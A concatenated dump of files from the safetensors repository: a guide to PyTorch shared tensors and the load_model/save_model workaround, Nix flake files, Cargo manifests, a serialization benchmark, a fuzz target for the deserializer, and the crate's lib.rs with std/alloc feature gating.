--------------------------------------------------------------------------------
1 | # Torch shared tensors
2 |
3 |
4 | ## TL;DR
5 |
6 | Use the dedicated functions below; they should work in most cases,
7 | though not without side effects.
8 |
9 | ```python
10 | from safetensors.torch import load_model, save_model
11 |
12 | save_model(model, "model.safetensors")
13 | # Instead of save_file(model.state_dict(), "model.safetensors")
14 |
15 | load_model(model, "model.safetensors")
16 | # Instead of model.load_state_dict(load_file("model.safetensors"))
17 | ```
18 |
19 | ## What are shared tensors?
20 |
21 | Pytorch uses shared tensors for some computations,
22 | which is extremely useful for reducing memory usage in general.
23 |
24 | One classic use case: in transformers, the `embeddings` are shared with
25 | `lm_head`. By using the same matrix, the model uses fewer parameters, and gradients
26 | flow much better to the `embeddings` (which sit at the start of the model, where
27 | gradients don't flow easily, whereas `lm_head` is at the tail, where gradients are
28 | strong; since they are the same tensor, both benefit).
29 |
30 |
31 | ```python
32 | import torch
33 | from torch import nn
34 | class Model(nn.Module):
35 | def __init__(self):
36 | super().__init__()
37 | self.a = nn.Linear(100, 100)
38 | self.b = self.a
39 |
40 | def forward(self, x):
41 | return self.b(self.a(x))
42 |
43 |
44 | model = Model()
45 | print(model.state_dict().keys())
46 | # odict_keys(['a.weight', 'a.bias', 'b.weight', 'b.bias'])
47 | torch.save(model.state_dict(), "model.bin")
48 | # This file is now 41k instead of ~80k, because `a` and `b` are the same weight, so only one copy is saved on disk, with both names pointing to the same buffer
49 | ```
50 |
51 | ## Why are shared tensors not saved in `safetensors`?
52 |
53 | Multiple reasons for that:
54 |
55 | - *Not all frameworks support them*, for instance `tensorflow` does not.
56 | So if someone saves shared tensors in torch, there would be no way to
57 | load them in a similar fashion, and we could not keep the same `Dict[str, Tensor]`
58 | API.
59 | - *It makes lazy loading tricky.*
60 | Lazy loading is the ability to load only some tensors, or parts of tensors, from
61 | a given file. This is trivial without tensor sharing, but with tensor sharing:
62 |
63 | ```python
64 | with safe_open("model.safetensors", framework="pt") as f:
65 | a = f.get_tensor("a")
66 | b = f.get_tensor("b")
67 | ```
68 |
69 | With this code, it's impossible to "reshare" buffers after the fact.
70 | Once we hand out the `a` tensor, we have no way to give back the same memory
71 | when you ask for `b`. (In this particular example we could keep track of handed-out
72 | buffers, but that is not the case in general, since you could do arbitrary work with `a`,
73 | like sending it to another device, before asking for `b`.)
74 | - *It can lead to much larger files than necessary*.
75 | If you are saving a shared tensor which is only a fraction of a larger tensor,
76 | then saving it with pytorch saves the entire buffer instead of
77 | just what is needed.
78 |
79 | ```python
80 | a = torch.zeros((100, 100))
81 | b = a[:1, :]
82 | torch.save({"b": b}, "model.bin")
83 | # File is 41k instead of the expected 400 bytes
84 | # In practice it could happen that you save tens of GB instead of 1GB.
85 | ```
86 |
87 | With all those reasons mentioned, nothing here is set in stone.
88 | Shared tensors do not cause any unsafety or denial-of-service potential, so this
89 | decision could be revisited if the current workarounds are not satisfactory.
90 |
91 | ## How does it work?
92 |
93 | The design is rather simple.
94 | We look for all shared tensors, then for all tensors
95 | covering the entire buffer (there can be multiple such tensors).
96 | That gives us multiple names which can be saved; we simply choose the first one.
97 |
98 | During `load_model`, we load a bit like `load_state_dict` does, except
99 | we look into the model itself to check for shared buffers, and ignore
100 | the "missing keys" which were actually covered by virtue of buffer sharing (they
101 | were properly loaded since a shared buffer was loaded under the hood).
102 | Every other error is raised as-is.
103 |
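As a rough sketch (not the actual implementation; the real `_find_shared_tensors` in `safetensors.torch` handles more cases, and this assumes torch >= 2.0 for `untyped_storage`), detecting shared tensors boils down to grouping names by underlying storage:

```python
import torch
from collections import defaultdict

def find_shared(state_dict):
    # Tensors that share a buffer point to the same underlying storage,
    # so grouping names by the storage's data pointer reveals the sharing.
    groups = defaultdict(set)
    for name, tensor in state_dict.items():
        groups[tensor.untyped_storage().data_ptr()].add(name)
    return [names for names in groups.values() if len(names) > 1]
```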
104 | **Caveat**: This means some keys are dropped from the file. So if you
105 | check the keys saved on disk, or load the file with `load_state_dict` directly,
106 | you will see some "missing tensors". Unless we start supporting shared tensors directly in
107 | the format, there is no real way around it.
108 |
--------------------------------------------------------------------------------
/flake.lock:
--------------------------------------------------------------------------------
1 | {
2 | "nodes": {
3 | "nixpkgs": {
4 | "locked": {
5 | "lastModified": 1730531603,
6 | "narHash": "sha256-Dqg6si5CqIzm87sp57j5nTaeBbWhHFaVyG7V6L8k3lY=",
7 | "owner": "NixOS",
8 | "repo": "nixpkgs",
9 | "rev": "7ffd9ae656aec493492b44d0ddfb28e79a1ea25d",
10 | "type": "github"
11 | },
12 | "original": {
13 | "owner": "NixOS",
14 | "ref": "nixos-unstable",
15 | "repo": "nixpkgs",
16 | "type": "github"
17 | }
18 | },
19 | "root": {
20 | "inputs": {
21 | "nixpkgs": "nixpkgs"
22 | }
23 | }
24 | },
25 | "root": "root",
26 | "version": 7
27 | }
28 |
--------------------------------------------------------------------------------
/flake.nix:
--------------------------------------------------------------------------------
1 | {
2 | inputs = {
3 | nixpkgs.url = "github:NixOS/nixpkgs/nixos-unstable";
4 | };
5 |
6 | outputs =
7 | { nixpkgs, ... }:
8 | let
9 | forAllSystems = nixpkgs.lib.genAttrs [
10 | "aarch64-linux"
11 | "x86_64-linux"
12 | "aarch64-darwin"
13 | ];
14 | in
15 | {
16 | devShells = forAllSystems (
17 | system:
18 | let
19 | pkgs = nixpkgs.legacyPackages.${system};
20 | in
21 | {
22 | default = pkgs.mkShell {
23 | buildInputs = with pkgs; [
24 | rustup
25 | python3Packages.python
26 | python3Packages.venvShellHook
27 | ];
28 | venvDir = "./.venv";
29 | postVenvCreation = ''
30 | unset SOURCE_DATE_EPOCH
31 | '';
32 | postShellHook = ''
33 | unset SOURCE_DATE_EPOCH
34 | '';
35 | LD_LIBRARY_PATH = "$LD_LIBRARY_PATH:${pkgs.stdenv.cc.cc.lib}/lib:${pkgs.zlib}/lib:/run/opengl-driver/lib";
36 | };
37 |
38 | }
39 | );
40 | };
41 | }
42 |
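With this flake, entering the development shell is a single command; it provides `rustup`, Python, and a project-local `.venv` through `venvShellHook`:

```bash
nix develop
```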
--------------------------------------------------------------------------------
/safetensors/Cargo.toml:
--------------------------------------------------------------------------------
1 | [package]
2 | name = "safetensors"
3 | version = "0.5.3-dev.0"
4 | edition = "2021"
5 | rust-version = "1.74"
6 | homepage = "https://github.com/huggingface/safetensors"
7 | repository = "https://github.com/huggingface/safetensors"
8 | documentation = "https://docs.rs/safetensors/"
9 | license = "Apache-2.0"
10 | keywords = ["safetensors", "huggingface", "Tensors", "Pytorch", "Tensorflow"]
11 | readme = "./README.md"
12 | description = """
13 | Provides functions to read and write safetensors which aim to be safer than
14 | their PyTorch counterpart.
15 | The format is 8 bytes which is an unsized int, being the size of a JSON header,
16 | the JSON header refers the `dtype` the `shape` and `data_offsets` which are the offsets
17 | for the values in the rest of the file.
18 | """
19 | exclude = [ "rust-toolchain", "target/*", "Cargo.lock"]
20 |
21 |
22 | # See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html
23 |
24 | [dependencies]
25 | hashbrown = { version = "0.15.2", features = ["serde"], optional = true }
26 | serde = { version = "1.0", default-features = false, features = ["derive"] }
27 | serde_json = { version = "1.0", default-features = false }
28 |
29 | [dev-dependencies]
30 | criterion = "0.5"
31 | memmap2 = "0.9"
32 | proptest = "1.4"
33 |
34 | [features]
35 | default = ["std"]
36 | std = ["serde/default", "serde_json/default"]
37 | alloc = ["serde/alloc", "serde_json/alloc", "hashbrown"]
38 |
39 | [[bench]]
40 | name = "benchmark"
41 | harness = false
42 |
--------------------------------------------------------------------------------
/safetensors/LICENSE:
--------------------------------------------------------------------------------
1 | ../LICENSE
--------------------------------------------------------------------------------
/safetensors/README.md:
--------------------------------------------------------------------------------
1 | ../README.md
--------------------------------------------------------------------------------
/safetensors/benches/benchmark.rs:
--------------------------------------------------------------------------------
1 | use criterion::{black_box, criterion_group, criterion_main, Criterion};
2 | use safetensors::tensor::*;
3 | use std::collections::HashMap;
4 |
5 | // Returns sample data of size 2_MB
6 | fn get_sample_data() -> (Vec<u8>, Vec<usize>, Dtype) {
7 | let shape = vec![1000, 500];
8 | let dtype = Dtype::F32;
9 | let n: usize = shape.iter().product::<usize>() * dtype.size(); // 4
10 | let data = vec![0; n];
11 |
12 | (data, shape, dtype)
13 | }
14 |
15 | pub fn bench_serialize(c: &mut Criterion) {
16 | let (data, shape, dtype) = get_sample_data();
17 | let n_layers = 5;
18 |
19 | let mut metadata: HashMap<String, TensorView> = HashMap::new();
20 | // 2_MB x 5 = 10_MB
21 | for i in 0..n_layers {
22 | let tensor = TensorView::new(dtype, shape.clone(), &data[..]).unwrap();
23 | metadata.insert(format!("weight{i}"), tensor);
24 | }
25 |
26 | c.bench_function("Serialize 10_MB", |b| {
27 | b.iter(|| {
28 | let _serialized = serialize(black_box(&metadata), black_box(&None));
29 | })
30 | });
31 | }
32 |
33 | pub fn bench_deserialize(c: &mut Criterion) {
34 | let (data, shape, dtype) = get_sample_data();
35 | let n_layers = 5;
36 |
37 | let mut metadata: HashMap<String, TensorView> = HashMap::new();
38 | // 2_MB x 5 = 10_MB
39 | for i in 0..n_layers {
40 | let tensor = TensorView::new(dtype, shape.clone(), &data[..]).unwrap();
41 | metadata.insert(format!("weight{i}"), tensor);
42 | }
43 |
44 | let out = serialize(&metadata, &None).unwrap();
45 |
46 | c.bench_function("Deserialize 10_MB", |b| {
47 | b.iter(|| {
48 | let _deserialized = SafeTensors::deserialize(black_box(&out)).unwrap();
49 | })
50 | });
51 | }
52 |
53 | criterion_group!(bench_ser, bench_serialize);
54 | criterion_group!(bench_de, bench_deserialize);
55 | criterion_main!(bench_ser, bench_de);
56 |
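Since the `[[bench]]` target in `safetensors/Cargo.toml` declares `harness = false`, these criterion benchmarks run with the standard command:

```bash
cd safetensors
cargo bench
```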
--------------------------------------------------------------------------------
/safetensors/fuzz/.gitignore:
--------------------------------------------------------------------------------
1 | target
2 | corpus
3 | artifacts
4 | coverage
5 |
--------------------------------------------------------------------------------
/safetensors/fuzz/Cargo.toml:
--------------------------------------------------------------------------------
1 | [package]
2 | name = "safetensors-fuzz"
3 | version = "0.0.0"
4 | publish = false
5 | edition = "2021"
6 |
7 | [package.metadata]
8 | cargo-fuzz = true
9 |
10 | [dependencies]
11 | libfuzzer-sys = "0.4"
12 |
13 | [dependencies.safetensors]
14 | path = ".."
15 |
16 | # Prevent this from interfering with workspaces
17 | [workspace]
18 | members = ["."]
19 |
20 | [profile.release]
21 | debug = 1
22 |
23 | [[bin]]
24 | name = "fuzz_target_1"
25 | path = "fuzz_targets/fuzz_target_1.rs"
26 | test = false
27 | doc = false
28 |
--------------------------------------------------------------------------------
/safetensors/fuzz/fuzz_targets/fuzz_target_1.rs:
--------------------------------------------------------------------------------
1 | #![no_main]
2 |
3 | use libfuzzer_sys::fuzz_target;
4 | use safetensors::tensor::SafeTensors;
5 |
6 | fuzz_target!(|data: &[u8]| {
7 | let _ = SafeTensors::deserialize(data);
8 | });
9 |
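This target feeds arbitrary bytes to `SafeTensors::deserialize` and asserts it never crashes. With [cargo-fuzz](https://github.com/rust-fuzz/cargo-fuzz) installed (it requires a nightly toolchain), a typical run is:

```bash
cargo install cargo-fuzz
cd safetensors
cargo +nightly fuzz run fuzz_target_1
```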
--------------------------------------------------------------------------------
/safetensors/src/lib.rs:
--------------------------------------------------------------------------------
1 | #![deny(missing_docs)]
2 | #![doc = include_str!("../README.md")]
3 | #![cfg_attr(not(feature = "std"), no_std)]
4 | pub mod slice;
5 | pub mod tensor;
6 | /// serialize_to_file is only available with the `std` feature
7 | #[cfg(feature = "std")]
8 | pub use tensor::serialize_to_file;
9 | pub use tensor::{serialize, Dtype, SafeTensorError, SafeTensors, View};
10 |
11 | #[cfg(feature = "alloc")]
12 | #[macro_use]
13 | extern crate alloc;
14 |
15 | #[cfg(all(feature = "std", feature = "alloc"))]
16 | compile_error!("must choose either the `std` or `alloc` feature, but not both.");
17 | #[cfg(all(not(feature = "std"), not(feature = "alloc")))]
18 | compile_error!("must choose either the `std` or `alloc` feature");
19 |
20 | /// A facade around all the types we need from the `std`, `core`, and `alloc`
21 | /// crates. This avoids elaborate import wrangling having to happen in every
22 | /// module.
23 | mod lib {
24 | #[cfg(not(feature = "std"))]
25 | mod no_stds {
26 | pub use alloc::borrow::Cow;
27 | pub use alloc::string::{String, ToString};
28 | pub use alloc::vec::Vec;
29 | pub use hashbrown::HashMap;
30 | }
31 | #[cfg(feature = "std")]
32 | mod stds {
33 | pub use std::borrow::Cow;
34 | pub use std::collections::HashMap;
35 | pub use std::string::{String, ToString};
36 | pub use std::vec::Vec;
37 | }
38 | /// choose std or no_std to export by feature flag
39 | #[cfg(not(feature = "std"))]
40 | pub use no_stds::*;
41 | #[cfg(feature = "std")]
42 | pub use stds::*;
43 | }
44 |
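Given the mutually exclusive `std`/`alloc` features declared above, a `no_std` build is a matter of disabling the defaults (a sketch; any target-specific flags are up to your platform):

```bash
# Default build, with `std`:
cargo build
# `no_std` build, backed by `alloc` and hashbrown:
cargo build --no-default-features --features alloc
```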
--------------------------------------------------------------------------------